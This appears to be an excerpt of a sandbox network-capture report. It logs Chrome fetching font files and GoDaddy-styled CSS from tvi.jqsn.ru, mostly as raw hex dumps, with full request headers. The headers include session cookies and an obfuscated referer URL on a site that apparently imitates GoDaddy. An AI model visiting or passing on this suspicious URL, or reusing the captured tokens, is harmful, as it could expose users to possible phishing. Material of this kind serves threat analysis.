                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6c 65 79 6e 73 6d 2c 23 30 30 30 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a
                                                                                                                          Data Ascii: ius: var(--ux-2jubes,2px); margin: 0 0 calc(var(--ux-1sbfig8,.25rem) * 5); color: var(--ux-1leynsm,#000); border: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 66 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 75 78 2d 62 75 74 74 6f 6e 2d 69 6e 6c 69 6e 65 29 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 61 63 74 69 76 65 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 6f 37 6a 75 30 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70
                                                                                                                          Data Ascii: f));}#sections_godaddy .ux-button:not(.ux-button-inline):not([disabled]):active { background-color: var(--ux-o7ju0h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transp


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.449779104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1399OUTGET /pqVb1I3EaC9yzhgYJIUPwx31 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:50 UTC718INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:50 GMT
                                                                                                                          Content-Type: font/woff2
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="pqVb1I3EaC9yzhgYJIUPwx31"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=84ITGm5Xu1j%2FR1js62LdZ8JMVYOUhbTVaAJ8iC7EX9ZSzErRazgTQc2U8Rgn14ezrjiJDWfK3k1wYLspknklOpv4Wp9RKQn2U8ZpPpblL86u3rCd8HiX22zg6Kgn4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddfb72ada0-ATL
                                                                                                                          2024-04-17 00:34:50 UTC651INData Raw: 33 32 65 39 0d 0a 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5
                                                                                                                          Data Ascii: 32e9wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 97 fd a3 36 85 5c b6 0c 28 af 6a c8 42 6e 0e d0 cf 4f 6a 16 26 2f 6a 40 11 27 54 db a1 8e 03 77 13 2c 9b ad 9f 2a be fa 92 65 8f 67 c7 b8 49 3d ef b3 77 d0 78 d0 0e 61 70 ba fc 3f fd 8d ce 05 0b a1 0f 6c 49 e0 8d 2f d1 be a1 75 75 44 48 cf 50 2e bd 18 d9 ea 29 ad 5f b3 00 da 3c c0 dd 43 06 78 fd fb cf db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a
                                                                                                                          Data Ascii: 6\(jBnOj&/j@'Tw,*egI=wxap?lI/uuDHP.)_<CxKhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: b7 bb 25 c2 22 9c 44 d9 c5 d0 12 b1 70 be 5a 41 16 48 db 9a 06 31 c8 ea 19 a9 3a 06 d4 aa 89 ad 9c 38 a7 c3 75 05 05 29 61 e9 ea 01 b0 66 02 87 c6 5d e0 c2 39 86 8e b5 2c 7b 06 32 90 0c 4c 11 9d 63 59 fe 64 e7 29 46 cc ca 38 a4 36 0c 35 1e 56 7f 9c 8a a0 23 15 51 05 41 e4 02 85 1c 3a 5e 35 01 24 1a 4e 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82
                                                                                                                          Data Ascii: %"DpZAH1:8u)af]9,{2LcYd)F865V#QA:^5$NJhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: ff f3 fe ff f9 47 bc d2 ed 87 ef a6 44 97 1a 59 a7 e4 bd 9f d1 bf ff f5 c8 d2 57 0b ed 38 0c f8 a4 94 94 3e b9 c9 ce b0 dd fc e4 f4 77 1f b0 b0 d0 62 3c 54 d4 68 72 35 be a6 b6 33 e0 f0 cc d4 80 f2 49 69 54 a2 d3 75 18 f2 51 98 3c 1f 93 5e bd b2 34 d0 7b da 5a d2 01 5d b7 91 70 f5 9e ee e7 df 29 84 2f 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27
                                                                                                                          Data Ascii: GDYW8>wb<Thr53IiTuQ<^4{Z]p)/!9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: cf 76 88 d9 a1 fe ec d5 1e c7 5d 0f f2 02 6b 19 fa 68 8b b4 29 22 bf 37 01 c6 33 e9 d9 4b e0 eb 40 3b 1d 57 d8 19 0a 69 f2 60 45 f0 80 4c 18 28 7b 07 b4 67 e8 7d 43 11 ec 12 48 9e e9 51 aa d3 1a e8 6e 7c 6c bd a4 5f 0d 62 d0 a9 94 38 ad 76 d5 a3 c4 03 2e 3b c9 3d d9 ad 04 7f 09 46 25 d3 e1 09 ae 2d cf 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70
                                                                                                                          Data Ascii: v]kh)"73K@;Wi`EL({g}CHQn|l_b8v.;=F%-TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/p
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: da 2b cd 07 a4 b5 4f ba fb a5 77 40 ea 0f 4a e5 e0 22 8d 43 86 93 3b 12 72 38 5a 99 ed 8e 7b e6 2d e7 3e 91 dd 49 2a 8b 3d b2 92 dc 17 5b 5c e7 e2 94 3f 1a 32 7d f5 4a 5f f5 b5 4c 2e 23 e3 b7 7f c7 05 01 96 e2 96 7d c5 ba 8d b7 29 dd 3d 0a a5 de 6b 4a 74 e7 95 fc ea 75 76 05 d9 74 b9 b0 24 95 be 39 e2 c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37
                                                                                                                          Data Ascii: +Ow@J"C;r8Z{->I*=[\?2}J_L.#})=kJtuvt$9dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: f7 b1 0a 71 72 1e 77 48 ac 1b eb c5 46 45 a5 53 58 c7 bf c1 c2 77 cf 6f 87 ab d4 21 cc 7f 20 9c 35 6d c6 ac 39 f3 16 2c 5a f2 15 0d 3a 5d 3f 18 a8 33 23 87 b4 68 d5 e6 a2 76 1d 3a 75 e9 b1 65 e8 a1 d0 a0 21 c3 46 8c 1a 7b cb 61 32 39 34 4c 9b a1 9b 3f 20 ce 93 71 c6 a6 97 af d5 63 8f 3c f1 dc 33 af 7c b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0
                                                                                                                          Data Ascii: qrwHFESXwo! 5m9,Z:]?3#hv:ue!F{a294L? qc<3|m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 68 76 30 01 b4 3f ae 1a bb 41 d8 33 9d 69 1f 82 83 04 e8 3a 24 08 47 26 74 0c c1 49 02 14 9d 12 84 33 13 3a 87 e0 22 81 48 5d 12 84 2b 13 ba 86 e0 26 81 28 dd 12 84 3b 13 ba 87 e0 21 01 aa 1e 09 c2 93 09 3d 43 ee 0f a0 ff 6f dc 1f 9f b9 18 cf db a7 31 f1 e7 ad 74 c8 90 f0 e5 1c 78 f6 57 88 bf cd 85 bf 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd
                                                                                                                          Data Ascii: hv0?A3i:$G&tI3:"H]+&(;!=Co1txWS{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 74 b1 93 64 ec 36 a8 6d 45 f0 2f 0a ee 01 03 97 4e 6b 3e c8 1a a3 ca b5 e2 69 65 a0 c5 2e 79 8d 81 34 28 2b 65 b7 cc 4f 20 50 d0 ec 5e cc 74 7f 91 9e 6b 38 15 78 eb de 2b c7 15 0b 16 1a b2 ee 4e ad c2 e9 8b 5b 73 fc 86 07 64 a7 05 b7 71 1f 2e 9d aa 83 ba a5 4f 3b 45 d4 12 4a 2e ad 61 00 bd a8 65 12 04 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35
                                                                                                                          Data Ascii: td6mE/Nk>ie.y4(+eO P^tk8x+N[sdq.O;EJ.ae.M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 56 e0 30 21 16 07 10 af 36 fd c1 be d0 cf ab a8 4d 1d 65 5a 7e b9 80 37 1c 55 3d e6 04 55 75 82 fc 15 d9 2b 1b 2a fb 62 0b 46 1e 9f b3 8c ec 16 70 86 18 f7 c7 16 02 3a 83 cf fc 9f 05 d7 e0 cb aa 57 e9 af 6c 68 ed c4 bf 48 4f 51 73 7c c8 df 97 af 25 0f 02 d8 bb 01 a0 1d 2b 89 f3 77 22 e2 12 dc 03 f9 3b 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36
                                                                                                                          Data Ascii: V0!6MeZ~7U=Uu+*bFp:WlhHOQs|%+w";[|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.449778104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1404OUTGET /yz4ne6w1ln1Sx0R456oW1wuxFqr49 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:49 UTC726INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:49 GMT
                                                                                                                          Content-Type: font/woff
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="yz4ne6w1ln1Sx0R456oW1wuxFqr49"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACa4CBEqrt4zEBoBZeJpNhnVcky6cfM8aj1Ybn60UCKO9DZZW903a6o7AjmSlV6WmQQejsRDu%2BfiRzXvJ9iCr5zgjWf%2FDf3tX8rtl%2BCr3KgqIDkIgRbq5csS9M0GGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddfb31673d-ATL
                                                                                                                          2024-04-17 00:34:49 UTC643INData Raw: 33 32 65 31 0d 0a 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00
                                                                                                                          Data Ascii: 32e1wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hhea
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 18 84 f3 61 80 11 4e 4b 24 18 93 30 31 61 72 c2 ec 84 e2 84 a3 09 b5 09 2d de 44 6f 5f ef 20 ef 48 ef 5d de 9f 78 27 7b 9f f3 ae f1 ae f7 6e f7 1e f4 96 7b 1b 7c c9 be 4c df 70 df cb be 75 be 0d be 2d be 77 7d fb 7d 15 a0 fa 7e cc b4 0b f9 e8 1f 28 85 7a 50 3a f5 a4 5e 74 15 3d 44 3f a6 87 69 39 ad a4 f5 f4 1a 6d a0 b7 e8 1d ca a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3
                                                                                                                          Data Ascii: aNK$01ar-Do_ H]x'{n{|Lpu-w}}~(zP:^t=D?i9mAEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjy
